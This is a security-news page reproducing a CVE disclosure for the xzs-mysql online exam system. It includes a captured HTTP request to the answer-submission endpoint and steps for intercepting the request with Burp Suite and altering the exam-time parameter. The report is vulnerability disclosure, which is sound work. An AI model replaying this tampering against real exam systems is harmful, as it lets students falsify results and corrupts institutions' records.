Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-46086: There is a Insecure Permissions vulnerability exists in XZS · Issue #327 · mindskip/xzs-mysql

xzs-mysql >= t3.4.0 is vulnerable to Insecure Permissions. The front end of this open source system is an online examination system. There is an unsafe vulnerability in the functional method of submitting examination papers. An attacker can use burpuite to modify parameters in the packet to destroy real data.

CVE
#sql#vulnerability#web#windows#apple#js#git

[Suggested description]
Insecure Permissions vulnerability exists in xzs-mysql.The front end of this open source system is an online examination system. There is an unsafe vulnerability in the functional method of submitting examination papers. An attacker can use burpuite to modify parameters in the packet to destroy real data.
Post: /api/student/exampaper/answer/answerSubmit

[Vulnerability Type]
Insecure Permissions

[Vendor of Product]
https://github.com/mindskip/xzs-mysql

[Affected Product Code Base]
t3.4.0

[Affected Component]
POST /api/student/exampaper/answer/answerSubmit HTTP/1.1
Host: localhost:8000
Content-Length: 135
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: application/json, text/plain, /
X-XSRF-TOKEN: 010353a5-cfe1-4fa8-9a28-0b9cfb4ca538
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
request-ajax: true
Content-Type: application/json
Origin: http://localhost:8000
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8000/student/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1640832435; adminUserName=admin; JSESSIONID=WIBLgnVPP4rhIJU3PzYXxEwTHTA5na4PoZADiRaS; studentUserName=test002; Hm_lpvt_cd8218cd51f800ed2b73e5751cb3f4f9=1640835202
Connection: close

{

​ "questionId":null,

​ "doTime":6,

​ answerItems":[

​ {

​ "questionId":1,

​ "content":null,

​ "contentArray":[

​ ],

​ "completed":false,

​ "itemOrder":1

​ }

​ ],

​ "id":1

}

[Attack Type]
Remote

[Impact Code execution]
false

Step 1: open the URL: http://localhost:8000/student/index.html#/paper/index , click "start answer".
image-20211230133426683
The total exam time is 60 minutes. You can see the remaining time displayed in the upper right.
image-20211230133519117
Step 2: open the burpsuite agent and click the submit button to obtain the packet capture data.
image-20211230133804919
The value of dotime indicates the number of seconds between the beginning of this test and clicking submit torque, which can be modified to any number.
image-20211230134153895

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907